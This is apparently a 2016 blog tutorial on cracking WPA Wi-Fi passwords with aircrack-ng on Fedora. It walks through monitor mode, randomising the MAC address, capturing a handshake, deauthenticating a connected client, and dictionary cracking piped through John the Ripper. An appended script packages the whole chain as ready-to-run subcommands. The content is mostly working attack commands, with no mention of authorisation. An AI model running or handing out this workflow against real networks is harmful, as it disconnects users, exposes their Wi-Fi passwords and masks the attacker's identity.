Saturday, 6 February 2016

Fedora 23 / Aircrack on HP Mini 210 3025sa

Working with airmon-ng on Fedora 23 running on HP Mini 210 3025sa with an Atheros AR9285 wifi card using stock kernel ath9k module.

First we need to stop all services that may interfere with the wireless interface. We can let airmon-ng tell us what it thinks might be troublesome and then stop these ourselves. Letting airmon-ng kill them (via airmon-ng check kill) only kills the processes; it does not stop systemd or other tools from restarting them, and on Fedora avahi-daemon is additionally socket-activated (avahi-daemon.socket), so stopping the units is the more reliable route. Before starting, disconnect from all wireless networks.
$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
769 NetworkManager
779 avahi-daemon
785 avahi-daemon
891 wpa_supplicant

$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop
Verify that the interface is down (there's no 'UP' flag)
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802 mtu 1500
At this point the wireless card is down and disconnected, and we need to put it into monitor mode. To do this manually,
$ iwconfig wlo1 mode monitor
leaves you the same interface name in the desired mode. To let airmon-ng handle it instead (it creates a separate monitor vif named wlo1mon and removes the station vif wlo1):
$ airmon-ng start wlo1
PHY Interface Driver Chipset

phy0 wlo1 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)

# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163 mtu 1500

$ ifconfig wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig wlo1mon up
At this stage we can use the newly created logical wlo1mon interface, now carrying a random MAC address from macchanger, with the airodump/aireplay/aircrack tools.
# see what is around; -a filters out unassociated clients, so only stations
# actually connected to an AP are listed
$ airodump-ng -a wlo1mon

# watch only the bssid found above on its channel, and write the capture to
# /tmp/wifi-01.cap (airodump-ng appends -NN.cap to the prefix given to -w)
$ airodump-ng -d <bssid> -c <channel> -w /tmp/wifi wlo1mon

# deauth one client so it reassociates and redoes the 4-way handshake; keep
# airodump-ng running on the channel while this is sent
$ aireplay-ng --deauth 1 -a <bssid> -c <client mac> wlo1mon

# attempt to crack the handshake using the dictionary file given with -w;
# airodump-ng shows "WPA handshake: <bssid>" in its header once one is logged.
# if the capture file contains more than one bssid, use -b to specify one for
# non-interactive use
$ aircrack-ng /tmp/wifi-01.cap -w /usr/share/dict/darkc0de
For long-running, resumable cracking sessions, John the Ripper can feed candidates to aircrack-ng while saving its own position under a named session.
# set up john with a named session and pipe its candidates to aircrack-ng
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi-01.cap


# use 'q' or Ctrl-C to pause cracking

# resume cracking from where the session left off
$ john --restore=foo | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi-01.cap


To clean up the logical interface and return the wireless card to normal use, stop the monitor interface (wlo1mon, not the original name) and restart the services:
$ airmon-ng stop wlo1mon
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
If ifconfig wlo1 still shows the randomised address, macchanger -p wlo1 (with the interface down) resets it to the permanent hardware MAC. At this point bring back the connection in NetworkManager and go about your day.
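The whole procedure above, wrapped into one script as an added example (this is not code from the original post). It assumes Fedora with systemd (systemctl instead of the service wrapper), root, airmon-ng, macchanger, iw, the interface name wlo1 from the post, and uses --bssid (the long form of -d) for airodump-ng; the subcommand names, the check_pids/is_mac/next_capture helpers and the session name "wifi" are this example's own. It adds the checks the post does not show: stopping the avahi socket unit so the daemon cannot be reactivated, validating MACs before they reach aireplay-ng/aircrack-ng, and computing the -NN.cap filename airodump-ng will actually write.

```shell
#!/bin/sh
# monitor.sh: the post's airmon-ng workflow as one script (added example, not
# from the original post). Assumes Fedora/systemd, root, airmon-ng, macchanger,
# iw and the interface wlo1. Subcommands: up, down, scan, capture, deauth,
# crack, resume. With no subcommand it only defines the functions.
set -eu

IFACE="${IFACE:-wlo1}"
MON="${IFACE}mon"
# units airmon-ng check flagged on the post's machine; avahi is also
# socket-activated, so its socket unit is stopped too or it comes back
STOP_UNITS="NetworkManager wpa_supplicant avahi-daemon avahi-daemon.socket"

# Read `airmon-ng check` output on stdin and print the PIDs it flagged: the
# table rows are "PID Name", so keep lines whose first field is all digits.
check_pids() {
    awk '$1 ~ /^[0-9]+$/ && NF >= 2 { print $1 }'
}

# Accept only a well-formed colon-separated MAC before it reaches aireplay-ng
# or aircrack-ng, which otherwise fail late with an unhelpful message.
is_mac() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# airodump-ng -w PREFIX writes PREFIX-01.cap and takes the next free number on
# later runs; mirror that so the crack step knows which file to open.
next_capture() {
    n=1
    while [ -e "${1}-$(printf '%02d' "$n").cap" ]; do
        n=$((n + 1))
    done
    printf '%s-%02d.cap\n' "$1" "$n"
}

monitor_up() {
    for u in $STOP_UNITS; do systemctl stop "$u"; done
    echo "processes airmon-ng still flags after the stop (should be empty):"
    airmon-ng check | check_pids
    ip link set "$IFACE" down
    airmon-ng start "$IFACE"         # creates $MON and removes the station vif
    ip link set "$MON" down          # macchanger refuses to run on a link that is up
    macchanger -r "$MON"
    ip link set "$MON" up
    iw dev "$MON" info               # expect "type monitor" in the output
}

monitor_down() {
    airmon-ng stop "$MON"            # the monitor vif, not $IFACE
    ip link set "$IFACE" down
    macchanger -p "$IFACE" || true   # back to the permanent MAC if it stayed random
    for u in avahi-daemon.socket avahi-daemon wpa_supplicant NetworkManager; do
        systemctl start "$u"
    done
}

capture() { # capture <bssid> <channel> <prefix>
    is_mac "$1" || { echo "bad bssid: $1" >&2; return 1; }
    echo "capture goes to $(next_capture "$3"); wait for 'WPA handshake: $1'"
    airodump-ng --bssid "$1" -c "$2" -w "$3" "$MON"
}

deauth() { # deauth <bssid> <client-mac>
    is_mac "$1" && is_mac "$2" || { echo "bad MAC address" >&2; return 1; }
    aireplay-ng --deauth 1 -a "$1" -c "$2" "$MON"
}

crack() { # crack <bssid> <capture> <wordlist> [session]  (resumable via john)
    is_mac "$1" || { echo "bad bssid: $1" >&2; return 1; }
    john --session="${4:-wifi}" --stdout --wordlist="$3" | aircrack-ng -w - -b "$1" "$2"
}

resume() { # resume <bssid> <capture> [session]
    john --restore="${3:-wifi}" | aircrack-ng -w - -b "$1" "$2"
}

case "${1:-}" in
    up)    monitor_up ;;
    down)  monitor_down ;;
    scan)  airodump-ng -a "$MON" ;;  # associated clients only, as in the post
    capture|deauth|crack|resume) cmd=$1; shift; "$cmd" "$@" ;;
    "")    ;;                        # sourced or run bare: definitions only
    *)     echo "usage: $0 up|down|scan|capture|deauth|crack|resume" >&2; exit 2 ;;
esac
```

Typical use is ./monitor.sh up, then scan, capture and deauth in separate terminals, then down when finished; the MAC and filename checks run before any packet is sent, which is where a typo in a BSSID otherwise costs a wasted capture.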
